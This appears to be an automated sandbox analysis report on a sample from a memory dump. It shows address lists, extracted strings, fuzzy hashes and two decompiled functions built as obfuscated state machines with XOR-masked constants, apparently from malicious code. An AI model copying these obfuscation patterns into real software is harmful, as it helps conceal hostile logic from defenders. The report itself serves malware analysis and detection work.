0x00bc73f3
0x00bc73fb
0x00bc7403
0x00bc740b
0x00bc7413
0x00bc741b
0x00bc7423
0x00bc742b
0x00bc7438
0x00bc743c
0x00bc7444
0x00bc7451
0x00bc7455
0x00bc745d
0x00bc7465
0x00bc7472
0x00bc7476
0x00bc747e
0x00bc7486
0x00bc748e
0x00bc7493
0x00bc749b
0x00bc749b
0x00bc74a9
0x00bc74d6
0x00bc750b
0x00bc7512
0x00bc7522
0x00bc755f
0x00bc7574
0x00bc757d
0x00bc7591
0x00bc7596
0x00bc7599
0x00bc759b
0x00bc759d
0x00000000
0x00bc759d
0x00bc74ab
0x00bc74b1
0x00000000
0x00bc74b7
0x00bc74b7
0x00000000
0x00bc74b7
0x00bc74b1
0x00000000
0x00bc74a9
0x00bc75a4
0x00bc75af
0x00bc75b1
0x00bc75b2
0x00bc75b6
0x00bc75ba
0x00bc75c2
0x00bc75c4
0x00bc75c6
0x00bc75cb
0x00bc75ce
0x00bc75d3
0x00bc75d3
0x00bc75d3
0x00bc75e8
0x00bc75e8

Strings

@f, xrefs: 00BC740B
5dBy, xrefs: 00BC736F
<, xrefs: 00BC72A9
=}s, xrefs: 00BC71F7
GJL, xrefs: 00BC71B6
.{u, xrefs: 00BC7291
rwMZ, xrefs: 00BC7275
9/x, xrefs: 00BC731A

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: <$.{u$5dBy$9/x$@f$GJL$rwMZ$=}s
API String ID: 0-3615119605
Opcode ID: 1d9c31cf3d10a62df779454b70e17b420462ef64e7ad3f37966d6f962f034d87
Instruction ID: f49a42fdb1f6b521cdd594bc83c800ede2e06f51b9467da4029816569ef8abbf
Opcode Fuzzy Hash: 1d9c31cf3d10a62df779454b70e17b420462ef64e7ad3f37966d6f962f034d87
Instruction Fuzzy Hash: D1C1ED724083819FD768DF21C98A94BFBE1FBC4758F108A1DF1A996260D7B58909CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00BC645F, Relevance: 9.1, Strings: 7, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00BC645F(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t334;
				signed int _t363;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t391;
				signed int* _t428;
				intOrPtr* _t429;
				signed int* _t432;
				void* _t435;

				_t428 = _a16;
				_t429 = __ecx;
				_push(_t428);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00BB8002(_t334);
				_v16 = 0x98cb51;
				_v12 = 0x3c049;
				_t432 =  &(( &_v180)[6]);
				_v8 = 0;
				_v4 = 0;
				_t391 = 0xd20c825;
				_v72 = 0xd4fd08;
				_v72 = _v72 + 0xffff3fe2;
				_v72 = _v72 ^ 0x00d43cea;
				_v100 = 0xb43979;
				_v100 = _v100 + 0xdd7b;
				_v100 = _v100 + 0x7f51;
				_v100 = _v100 ^ 0x00bdaefa;
				_v148 = 0x688e71;
				_v148 = _v148 >> 0xb;
				_v148 = _v148 >> 4;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x000f5470;
				_v156 = 0xa25f88;
				_v156 = _v156 << 4;
				_v156 = _v156 | 0xfed7c077;
				_t381 = 0x78;
				_v156 = _v156 / _t381;
				_v156 = _v156 ^ 0x021a57da;
				_v108 = 0x707e55;
				_v108 = _v108 << 3;
				_v108 = _v108 + 0xffffca5a;
				_v108 = _v108 ^ 0x03898e17;
				_v164 = 0x2323f6;
				_t382 = 3;
				_v164 = _v164 / _t382;
				_v164 = _v164 | 0x794a01bb;
				_v164 = _v164 + 0x7fc3;
				_v164 = _v164 ^ 0x7949cce9;
				_v116 = 0x10d9b5;
				_v116 = _v116 << 1;
				_v116 = _v116 + 0x8e77;
				_v116 = _v116 ^ 0x002e5eeb;
				_v64 = 0x61f10b;
				_t383 = 0x1f;
				_v64 = _v64 / _t383;
				_v64 = _v64 ^ 0x000e408b;
				_v120 = 0xcdc1fe;
				_v120 = _v120 + 0xffff35b0;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x000161d2;
				_v172 = 0xcff9d7;
				_v172 = _v172 * 0x44;
				_v172 = _v172 + 0x29e8;
				_v172 = _v172 >> 2;
				_v172 = _v172 ^ 0x0dcdd6e0;
				_v96 = 0x30b6c3;
				_v96 = _v96 | 0x9550d1e6;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0xdce37511;
				_v168 = 0x41358f;
				_v168 = _v168 << 8;
				_t384 = 0x7e;
				_v168 = _v168 * 0x3f;
				_v168 = _v168 | 0xbe8ff062;
				_v168 = _v168 ^ 0xbeaa9942;
				_v144 = 0xb99b38;
				_v144 = _v144 / _t384;
				_v144 = _v144 >> 7;
				_t385 = 0x39;
				_v144 = _v144 / _t385;
				_v144 = _v144 ^ 0x000dad23;
				_v176 = 0xeda7d3;
				_v176 = _v176 >> 4;
				_t386 = 0x43;
				_v176 = _v176 / _t386;
				_v176 = _v176 | 0xb383abbb;
				_v176 = _v176 ^ 0xb381acb6;
				_v48 = 0x1d02f6;
				_v48 = _v48 * 0x53;
				_v48 = _v48 ^ 0x09659576;
				_v124 = 0xe3cbc1;
				_v124 = _v124 * 0x72;
				_v124 = _v124 << 0xf;
				_v124 = _v124 ^ 0x5dfad653;
				_v80 = 0xefae10;
				_v80 = _v80 + 0xc29a;
				_v80 = _v80 ^ 0x00fed70e;
				_v92 = 0x45dff5;
				_v92 = _v92 << 4;
				_v92 = _v92 | 0xd162baeb;
				_v92 = _v92 ^ 0xd5785aea;
				_v88 = 0xdba462;
				_v88 = _v88 >> 2;
				_v88 = _v88 >> 2;
				_v88 = _v88 ^ 0x000ec23a;
				_v160 = 0x3badbb;
				_v160 = _v160 + 0xffff04ab;
				_v160 = _v160 * 0x5e;
				_v160 = _v160 ^ 0x5b663051;
				_v160 = _v160 ^ 0x4ee8a23c;
				_v152 = 0xf3cebd;
				_v152 = _v152 | 0xa76b47fd;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x3fd1623d;
				_v76 = 0x89d29;
				_v76 = _v76 * 9;
				_v76 = _v76 ^ 0x004facba;
				_v60 = 0x5b4976;
				_v60 = _v60 + 0xea1e;
				_v60 = _v60 ^ 0x00560879;
				_v52 = 0x5a6692;
				_v52 = _v52 | 0x37962189;
				_v52 = _v52 ^ 0x37d57e68;
				_v84 = 0xa9ec09;
				_v84 = _v84 + 0x203e;
				_v84 = _v84 + 0xffffb76b;
				_v84 = _v84 ^ 0x00ae77e8;
				_v68 = 0x815203;
				_v68 = _v68 | 0xc1a2254d;
				_v68 = _v68 ^ 0xc1ac353f;
				_v104 = 0x891afc;
				_t387 = 0x66;
				_v104 = _v104 / _t387;
				_v104 = _v104 + 0xa24f;
				_v104 = _v104 ^ 0x00024957;
				_v136 = 0x8c7d48;
				_t388 = 0x44;
				_v136 = _v136 * 0x2b;
				_v136 = _v136 / _t388;
				_v136 = _v136 ^ 0x005614a5;
				_v180 = 0x49b8e9;
				_v180 = _v180 + 0xcb11;
				_v180 = _v180 + 0x107f;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 ^ 0x0007bf2b;
				_v112 = 0xcb8072;
				_v112 = _v112 + 0x438b;
				_v112 = _v112 + 0xc93b;
				_v112 = _v112 ^ 0x00c61165;
				_v128 = 0x2dbaae;
				_v128 = _v128 | 0xaa33a377;
				_v128 = _v128 * 0x72;
				_v128 = _v128 ^ 0xd0626618;
				_v140 = 0x4079e7;
				_v140 = _v140 + 0xbe65;
				_v140 = _v140 ^ 0xdcbbe985;
				_v140 = _v140 >> 6;
				_v140 = _v140 ^ 0x037b6a47;
				_v56 = 0xc18d65;
				_v56 = _v56 + 0xd572;
				_v56 = _v56 ^ 0x00c20e2d;
				_v132 = 0x778d04;
				_v132 = _v132 + 0xffff449b;
				_v132 = _v132 ^ 0x73bdd683;
				_v132 = _v132 ^ 0x73cf90ea;
				goto L1;
				do {
					while(1) {
						L1:
						_t435 = _t391 - 0x9ae9bd9;
						if(_t435 > 0) {
							break;
						}
						if(_t435 == 0) {
							E00BBE1EB( &_v44,  *((intOrPtr*)(_t429 + 4)), _v88, _v160, _v152, _v76);
							_t432 =  &(_t432[4]);
							_t391 = 0x73af45;
							continue;
						} else {
							if(_t391 == 0x5c49d0) {
								E00BC0824(_v128, _v140, __eflags, _v56,  &_v44, _t429 + 0x28, _v132);
							} else {
								if(_t391 == 0x73af45) {
									E00BBE1EB( &_v44,  *((intOrPtr*)(_t429 + 0x14)), _v60, _v52, _v84, _v68);
									_t432 =  &(_t432[4]);
									_t391 = 0xc04225f;
									continue;
								} else {
									if(_t391 == 0x361ae68) {
										E00BBE1EB( &_v44,  *((intOrPtr*)(_t429 + 0x10)), _v48, _v124, _v80, _v92);
										_t432 =  &(_t432[4]);
										_t391 = 0x9ae9bd9;
										continue;
									} else {
										if(_t391 == 0x3918d83) {
											_t428[1] = E00BBD899(_t429);
											_t391 = 0x9dcec49;
											continue;
										} else {
											if(_t391 != 0x481cc30) {
												goto L25;
											} else {
												E00BBE1EB( &_v44,  *_t429, _v96, _v168, _v144, _v176);
												_t432 =  &(_t432[4]);
												_t391 = 0x361ae68;
												continue;
											}
										}
									}
								}
							}
						}
						L28:
						__eflags =  *_t428;
						_t333 =  *_t428 != 0;
						__eflags = _t333;
						return 0 | _t333;
					}
					__eflags = _t391 - 0x9dcec49;
					if(_t391 == 0x9dcec49) {
						_push(_t391);
						_t363 = E00BC6F53(_t428[1]);
						 *_t428 = _t363;
						__eflags = _t363;
						if(__eflags == 0) {
							_t391 = 0xd61d1a6;
							goto L25;
						} else {
							_t391 = 0x9e0876e;
							goto L1;
						}
					} else {
						__eflags = _t391 - 0x9e0876e;
						if(_t391 == 0x9e0876e) {
							E00BC777F(_v156, _v108,  &_v44, _t428, _v164);
							_t432 =  &(_t432[3]);
							_t391 = 0xb1f45ee;
							goto L1;
						} else {
							__eflags = _t391 - 0xb1f45ee;
							if(__eflags == 0) {
								E00BC0824(_v116, _v64, __eflags, _v120,  &_v44, _t429 + 0x18, _v172);
								_t432 =  &(_t432[4]);
								_t391 = 0x481cc30;
								goto L1;
							} else {
								__eflags = _t391 - 0xc04225f;
								if(_t391 == 0xc04225f) {
									E00BBE1EB( &_v44,  *((intOrPtr*)(_t429 + 0x30)), _v104, _v136, _v180, _v112);
									_t432 =  &(_t432[4]);
									_t391 = 0x5c49d0;
									goto L1;
								} else {
									__eflags = _t391 - 0xd20c825;
									if(__eflags != 0) {
										goto L25;
									} else {
										_t391 = 0x3918d83;
										 *_t428 = 0;
										_t428[1] = _v72;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t391 - 0xd61d1a6;
				} while (__eflags != 0);
				goto L28;
			}

0x00bc6469
0x00bc6470
0x00bc6472
0x00bc6473
0x00bc647a
0x00bc6481
0x00bc6488
0x00bc6489
0x00bc648a
0x00bc648f
0x00bc649c
0x00bc64a7
0x00bc64aa
0x00bc64b3
0x00bc64ba
0x00bc64bf
0x00bc64c7
0x00bc64cf
0x00bc64d7
0x00bc64df
0x00bc64e7
0x00bc64ef
0x00bc64f7
0x00bc64ff
0x00bc6504
0x00bc6509
0x00bc650e
0x00bc6516
0x00bc651e
0x00bc6523
0x00bc6531
0x00bc6536
0x00bc653c
0x00bc6544
0x00bc654c
0x00bc6551
0x00bc6559
0x00bc6561
0x00bc656d
0x00bc6572
0x00bc6578
0x00bc6580
0x00bc6588
0x00bc6590
0x00bc6598
0x00bc659c
0x00bc65a4
0x00bc65ac
0x00bc65be
0x00bc65c1
0x00bc65c8
0x00bc65d3
0x00bc65db
0x00bc65e3
0x00bc65e8
0x00bc65f0
0x00bc65fd
0x00bc6601
0x00bc6609
0x00bc660e
0x00bc6616
0x00bc661e
0x00bc662b
0x00bc6631
0x00bc6639
0x00bc6641
0x00bc664d
0x00bc6650
0x00bc6654
0x00bc665c
0x00bc6664
0x00bc6674
0x00bc6678
0x00bc6681
0x00bc6686
0x00bc668c
0x00bc6694
0x00bc669c
0x00bc66a5
0x00bc66a8
0x00bc66ac
0x00bc66b4
0x00bc66bc
0x00bc66cf
0x00bc66d6
0x00bc66e1
0x00bc66ee
0x00bc66f2
0x00bc66f7
0x00bc66ff
0x00bc6707
0x00bc670f
0x00bc6717
0x00bc671f
0x00bc6724
0x00bc672c
0x00bc6734
0x00bc673c
0x00bc6741
0x00bc6746
0x00bc674e
0x00bc6756
0x00bc6763
0x00bc6767
0x00bc676f
0x00bc6777
0x00bc677f
0x00bc6787
0x00bc678c
0x00bc6794
0x00bc67a1
0x00bc67a5
0x00bc67ad
0x00bc67b8
0x00bc67c3
0x00bc67ce
0x00bc67d9
0x00bc67e4
0x00bc67ef
0x00bc67f7
0x00bc67ff
0x00bc6807
0x00bc680f
0x00bc681a
0x00bc6825
0x00bc6830
0x00bc6840
0x00bc6845
0x00bc684b
0x00bc6853
0x00bc685b
0x00bc6868
0x00bc6869
0x00bc6878
0x00bc687c
0x00bc6884
0x00bc688c
0x00bc6894
0x00bc689c
0x00bc68a1
0x00bc68a9
0x00bc68b1
0x00bc68b9
0x00bc68c1
0x00bc68c9
0x00bc68d1
0x00bc68de
0x00bc68e2
0x00bc68ea
0x00bc68f2
0x00bc68fa
0x00bc6902
0x00bc6907
0x00bc690f
0x00bc691a
0x00bc6925
0x00bc6930
0x00bc6938
0x00bc6940
0x00bc6948
0x00bc6948
0x00bc6950
0x00bc6950
0x00bc6950
0x00bc6950
0x00bc6952
0x00000000
0x00000000
0x00bc6958
0x00bc6a46
0x00bc6a4b
0x00bc6a4e
0x00000000
0x00bc695e
0x00bc6964
0x00bc6b77
0x00bc696a
0x00bc6970
0x00bc6a1a
0x00bc6a1f
0x00bc6a22
0x00000000
0x00bc6976
0x00bc697c
0x00bc69e8
0x00bc69ed
0x00bc69f0
0x00000000
0x00bc697e
0x00bc6984
0x00bc69c1
0x00bc69c4
0x00000000
0x00bc6986
0x00bc698c
0x00000000
0x00bc6992
0x00bc69ab
0x00bc69b0
0x00bc69b3
0x00000000
0x00bc69b3
0x00bc698c
0x00bc6984
0x00bc697c
0x00bc6970
0x00bc6964
0x00bc6b7f
0x00bc6b81
0x00bc6b86
0x00bc6b86
0x00bc6b90
0x00bc6b90
0x00bc6a58
0x00bc6a5e
0x00bc6b2e
0x00bc6b2f
0x00bc6b34
0x00bc6b37
0x00bc6b39
0x00bc6b45
0x00000000
0x00bc6b3b
0x00bc6b3b
0x00000000
0x00bc6b3b
0x00bc6a64
0x00bc6a64
0x00bc6a6a
0x00bc6b11
0x00bc6b16
0x00bc6b19
0x00000000
0x00bc6a70
0x00bc6a70
0x00bc6a76
0x00bc6aea
0x00bc6aef
0x00bc6af2
0x00000000
0x00bc6a78
0x00bc6a78
0x00bc6a7e
0x00bc6ab9
0x00bc6abe
0x00bc6ac1
0x00000000
0x00bc6a80
0x00bc6a80
0x00bc6a86
0x00000000
0x00bc6a8c
0x00bc6a90
0x00bc6a95
0x00bc6a97
0x00000000
0x00bc6a97
0x00bc6a86
0x00bc6a7e
0x00bc6a76
0x00bc6a6a
0x00000000
0x00bc6b4a
0x00bc6b4a
0x00bc6b4a
0x00000000

Strings

vI[, xrefs: 00BC67AD
Q0f[, xrefs: 00BC6767
y@, xrefs: 00BC68EA
> , xrefs: 00BC67F7
^., xrefs: 00BC65A4
U~p, xrefs: 00BC6544
), xrefs: 00BC6601

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: > $Q0f[$U~p$vI[$)$^.$y@
API String ID: 0-3549945254
Opcode ID: e99c1fb2487f1a21cba81a7a5bd15f2a8fcd60f9c05ad87de20bc7758406dff3
Instruction ID: f9abbaae3551009ec9fd016d055a8e0b14ad31f55457c16a52f6368615e0cbb1
Opcode Fuzzy Hash: e99c1fb2487f1a21cba81a7a5bd15f2a8fcd60f9c05ad87de20bc7758406dff3
Instruction Fuzzy Hash: 190231B1408381DFD768CF61C58AA5BFBE1FB94748F108A1DF29A96260C7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8112, Relevance: 9.0, Strings: 7, Instructions: 279
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00BB8112() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t309;
				void* _t321;
				intOrPtr _t324;
				intOrPtr _t327;
				void* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t339;
				void* _t356;
				intOrPtr _t359;
				void* _t360;
				signed int* _t364;

				_t364 =  &_v152;
				_v16 = 0x5dc11c;
				_v12 = 0x7fb4c5;
				_t328 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v96 = 0x5491c5;
				_v96 = _v96 + 0xffff56c6;
				_v96 = _v96 + 0xffff2f6f;
				_v96 = _v96 ^ 0x005317fa;
				_v152 = 0x8e9ef5;
				_v152 = _v152 * 0x51;
				_t360 = 0xd44424e;
				_v152 = _v152 + 0xa790;
				_v152 = _v152 >> 0xa;
				_v152 = _v152 ^ 0x000b483c;
				_v68 = 0x72c428;
				_v68 = _v68 + 0xffff76d4;
				_t330 = 0x4a;
				_v68 = _v68 / _t330;
				_v68 = _v68 ^ 0x00018b2c;
				_v108 = 0xbf9bbd;
				_v108 = _v108 ^ 0x339580ad;
				_v108 = _v108 ^ 0xb4fd00a2;
				_v108 = _v108 ^ 0x87d71bb2;
				_v40 = 0x92c9b3;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x00024b26;
				_v60 = 0xa1f01c;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00017e81;
				_v104 = 0x64c1e9;
				_v104 = _v104 * 0x43;
				_v104 = _v104 ^ 0xbff4ef2f;
				_v104 = _v104 ^ 0xa5aa5c00;
				_v52 = 0xd4a17d;
				_v52 = _v52 >> 0xf;
				_v52 = _v52 ^ 0x0004c33a;
				_v100 = 0x79e5ad;
				_v100 = _v100 + 0xa8e0;
				_v100 = _v100 + 0xd7dd;
				_v100 = _v100 ^ 0x007ae753;
				_v24 = 0x3b9730;
				_v24 = _v24 + 0xffff04dc;
				_v24 = _v24 ^ 0x003c1a0a;
				_v116 = 0xebf3d1;
				_v116 = _v116 | 0xa470fdcf;
				_v116 = _v116 ^ 0x74c1282c;
				_v116 = _v116 >> 3;
				_v116 = _v116 ^ 0x1a08f8f9;
				_v132 = 0x4ae92d;
				_v132 = _v132 ^ 0x1312316a;
				_v132 = _v132 << 0x10;
				_v132 = _v132 + 0xffffcfd5;
				_v132 = _v132 ^ 0xd84eed71;
				_v124 = 0x95d490;
				_v124 = _v124 + 0x88a4;
				_v124 = _v124 + 0xb0e0;
				_v124 = _v124 >> 2;
				_v124 = _v124 ^ 0x00299152;
				_v44 = 0xb273bc;
				_v44 = _v44 | 0x1e3d9bd9;
				_v44 = _v44 ^ 0x1eb01182;
				_v140 = 0x2e6656;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 + 0xffff0eee;
				_v140 = _v140 | 0xa1181487;
				_v140 = _v140 ^ 0xfffb33ad;
				_v28 = 0x4d8c50;
				_v28 = _v28 * 0xa;
				_v28 = _v28 ^ 0x0301dfcb;
				_v80 = 0xf92d4c;
				_t331 = 0x55;
				_v80 = _v80 * 0x72;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0xbd84355e;
				_v88 = 0xb62b9;
				_v88 = _v88 | 0x0711dddd;
				_v88 = _v88 + 0xffffb9ad;
				_v88 = _v88 ^ 0x07170adc;
				_v84 = 0xb8eaf1;
				_v84 = _v84 ^ 0x54a0a05b;
				_v84 = _v84 | 0x2c7cd408;
				_v84 = _v84 ^ 0x7c7ec05d;
				_v76 = 0xfcc78d;
				_v76 = _v76 ^ 0xfaf164c7;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x1f407767;
				_v148 = 0x52c534;
				_v148 = _v148 ^ 0x9312ff4d;
				_v148 = _v148 + 0xffff4af6;
				_v148 = _v148 << 3;
				_v148 = _v148 ^ 0x99fba233;
				_v92 = 0x14adf;
				_v92 = _v92 | 0x95aaf966;
				_v92 = _v92 ^ 0x2b4a1f7a;
				_v92 = _v92 ^ 0xbee45b56;
				_v32 = 0x764abc;
				_v32 = _v32 ^ 0xe78f7666;
				_v32 = _v32 ^ 0xe7f18097;
				_v112 = 0xd6e113;
				_v112 = _v112 + 0x1ea2;
				_v112 = _v112 / _t331;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0004bfbc;
				_v120 = 0x80bdf3;
				_t332 = 0xa;
				_v120 = _v120 / _t332;
				_v120 = _v120 + 0xffff255d;
				_v120 = _v120 | 0xbc80fafb;
				_v120 = _v120 ^ 0xbc86a6dd;
				_v72 = 0xbefe89;
				_v72 = _v72 + 0xffffc350;
				_v72 = _v72 << 6;
				_v72 = _v72 ^ 0x2fbee236;
				_v136 = 0xafaab4;
				_v136 = _v136 * 0x15;
				_v136 = _v136 >> 6;
				_v136 = _v136 + 0xb27b;
				_v136 = _v136 ^ 0x003aa308;
				_v36 = 0x1a2118;
				_v36 = _v36 | 0x88c36a30;
				_v36 = _v36 ^ 0x88d582e2;
				_v144 = 0xa3f39;
				_v144 = _v144 | 0xe60b198f;
				_v144 = _v144 + 0xffffe6c2;
				_v144 = _v144 << 4;
				_v144 = _v144 ^ 0x60bd9dae;
				_v48 = 0x8bd4bb;
				_v48 = _v48 + 0xffff4967;
				_v48 = _v48 ^ 0x00804b4a;
				_v128 = 0xd6f6e2;
				_v128 = _v128 + 0xffff8b2a;
				_v128 = _v128 + 0x73db;
				_v128 = _v128 ^ 0x77cb5959;
				_v128 = _v128 ^ 0x771d3ce6;
				_v56 = 0xa97c43;
				_v56 = _v56 ^ 0x0ddf0829;
				_v56 = _v56 ^ 0x0d7f1210;
				_v64 = 0x5ee950;
				_v64 = _v64 + 0xffffecfd;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x000f52e8;
				while(1) {
					L1:
					_t309 = 0xa781f72;
					do {
						L2:
						if(_t360 == 0x41998ad) {
							E00BBF699(_v72,  *((intOrPtr*)( *0xbd5bd4 + 0x14)), _v136, _v36, _v144);
							E00BBF699(_v48,  *0xbd5bd4, _v128, _v56, _v64);
							_t364 =  &(_t364[6]);
							_t360 = 0xcc3da0e;
							L13:
							_t309 = 0xa781f72;
							goto L14;
						}
						if(_t360 == 0x516f09d) {
							_t296 =  &_v112; // 0x7ae753
							E00BB2CF9(_v32,  *_t296, _v40, _v120, _v20);
							L17:
							return _t328;
						}
						if(_t360 == 0x7dea44d) {
							_push(0xbb1764);
							__eflags = E00BB92DD(E00BD0AD3(_v24, _v116, __eflags), _v96, _v132,  &_v20, 0, _v124, _v44, _v140) - _v152;
							_t360 =  ==  ? 0xa781f72 : 0x41998ad;
							_t339 = _v28;
							E00BC2EED(_t339, _v80, _v88, _t314);
							_t364 =  &(_t364[9]);
							goto L13;
						}
						if(_t360 == _t309) {
							_t339 = _v20;
							_t321 = E00BC1270(_t339, _v84, _v76,  *((intOrPtr*)( *0xbd5bd4 + 0x18)), _v148,  *((intOrPtr*)( *0xbd5bd4 + 0x14)), _v92, _v68);
							_t364 =  &(_t364[6]);
							__eflags = _t321 - _v108;
							if(__eflags != 0) {
								_t360 = 0x41998ad;
							} else {
								_t360 = 0x516f09d;
								_t328 = 1;
							}
							while(1) {
								L1:
								_t309 = 0xa781f72;
								goto L2;
							}
						}
						if(_t360 != 0xd44424e) {
							goto L14;
						}
						_push(_t339);
						_t356 = 0x48;
						_t324 = E00BC6F53(_t356);
						 *0xbd5bd4 = _t324;
						 *((intOrPtr*)(_t324 + 0x18)) = 0x4000;
						_t327 = E00BC6F53( *((intOrPtr*)( *0xbd5bd4 + 0x18)));
						_t359 =  *0xbd5bd4;
						_t360 = 0x7dea44d;
						_t339 =  *((intOrPtr*)(_t359 + 0x18)) + _t327;
						 *((intOrPtr*)(_t359 + 0x14)) = _t327;
						 *((intOrPtr*)(_t359 + 0x3c)) = _t327;
						 *((intOrPtr*)(_t359 + 0x20)) = _t327;
						 *(_t359 + 0xc) = _t339;
						goto L1;
						L14:
						__eflags = _t360 - 0xcc3da0e;
					} while (__eflags != 0);
					goto L17;
				}
			}

0x00bb8112
0x00bb8118
0x00bb8125
0x00bb8131
0x00bb8133
0x00bb813a
0x00bb8141
0x00bb8149
0x00bb8151
0x00bb8159
0x00bb8161
0x00bb8173
0x00bb8177
0x00bb817c
0x00bb8184
0x00bb8189
0x00bb8191
0x00bb8199
0x00bb81a5
0x00bb81a8
0x00bb81ac
0x00bb81b4
0x00bb81bc
0x00bb81c4
0x00bb81cc
0x00bb81d4
0x00bb81df
0x00bb81e7
0x00bb81f2
0x00bb81fa
0x00bb81ff
0x00bb8207
0x00bb8214
0x00bb8218
0x00bb8220
0x00bb8228
0x00bb8230
0x00bb8235
0x00bb823d
0x00bb8245
0x00bb824d
0x00bb8255
0x00bb825d
0x00bb8268
0x00bb8273
0x00bb827e
0x00bb8286
0x00bb828e
0x00bb8296
0x00bb829b
0x00bb82a3
0x00bb82ab
0x00bb82b3
0x00bb82b8
0x00bb82c0
0x00bb82c8
0x00bb82d0
0x00bb82d8
0x00bb82e0
0x00bb82e5
0x00bb82ed
0x00bb82f5
0x00bb82fd
0x00bb8305
0x00bb830d
0x00bb8312
0x00bb831a
0x00bb8322
0x00bb832a
0x00bb833d
0x00bb8344
0x00bb834f
0x00bb8360
0x00bb8363
0x00bb8367
0x00bb836c
0x00bb8374
0x00bb837c
0x00bb8384
0x00bb838c
0x00bb8394
0x00bb839c
0x00bb83a4
0x00bb83ac
0x00bb83b4
0x00bb83bc
0x00bb83c4
0x00bb83c9
0x00bb83d1
0x00bb83d9
0x00bb83e1
0x00bb83e9
0x00bb83ee
0x00bb83f6
0x00bb83fe
0x00bb8406
0x00bb840e
0x00bb8416
0x00bb8421
0x00bb842c
0x00bb8437
0x00bb843f
0x00bb844f
0x00bb8453
0x00bb8458
0x00bb8460
0x00bb846c
0x00bb846f
0x00bb8473
0x00bb847b
0x00bb8483
0x00bb848b
0x00bb8493
0x00bb849b
0x00bb84a0
0x00bb84a8
0x00bb84b5
0x00bb84b9
0x00bb84be
0x00bb84c6
0x00bb84ce
0x00bb84d9
0x00bb84e4
0x00bb84ef
0x00bb84f7
0x00bb84ff
0x00bb8507
0x00bb850c
0x00bb8514
0x00bb851c
0x00bb8524
0x00bb852c
0x00bb8534
0x00bb853c
0x00bb8544
0x00bb854c
0x00bb8554
0x00bb855c
0x00bb8564
0x00bb856c
0x00bb8574
0x00bb857c
0x00bb8581
0x00bb858e
0x00bb858e
0x00bb858e
0x00bb8593
0x00bb8593
0x00bb8595
0x00bb86ea
0x00bb870b
0x00bb8710
0x00bb8713
0x00bb8718
0x00bb8718
0x00000000
0x00bb8718
0x00bb85a1
0x00bb873d
0x00bb8748
0x00bb8753
0x00bb875c
0x00bb875c
0x00bb85ad
0x00bb8670
0x00bb86aa
0x00bb86ba
0x00bb86bd
0x00bb86c4
0x00bb86c9
0x00000000
0x00bb86c9
0x00bb85b5
0x00bb863c
0x00bb8643
0x00bb8648
0x00bb864b
0x00bb864f
0x00bb865e
0x00bb8651
0x00bb8653
0x00bb8658
0x00bb8658
0x00bb858e
0x00bb858e
0x00bb858e
0x00000000
0x00bb858e
0x00bb858e
0x00bb85bd
0x00000000
0x00000000
0x00bb85cb
0x00bb85ce
0x00bb85cf
0x00bb85d4
0x00bb85d9
0x00bb85f1
0x00bb85f6
0x00bb85fc
0x00bb8605
0x00bb8607
0x00bb860a
0x00bb860d
0x00bb8610
0x00000000
0x00bb871d
0x00bb871d
0x00bb871d
0x00000000
0x00bb8729

Strings

P^, xrefs: 00BB856C
Vf., xrefs: 00BB8305
NBD, xrefs: 00BB8177
9?, xrefs: 00BB84EF
NBD, xrefs: 00BB85B7
-J, xrefs: 00BB82A3
Sz, xrefs: 00BB873D

Memory Dump Source

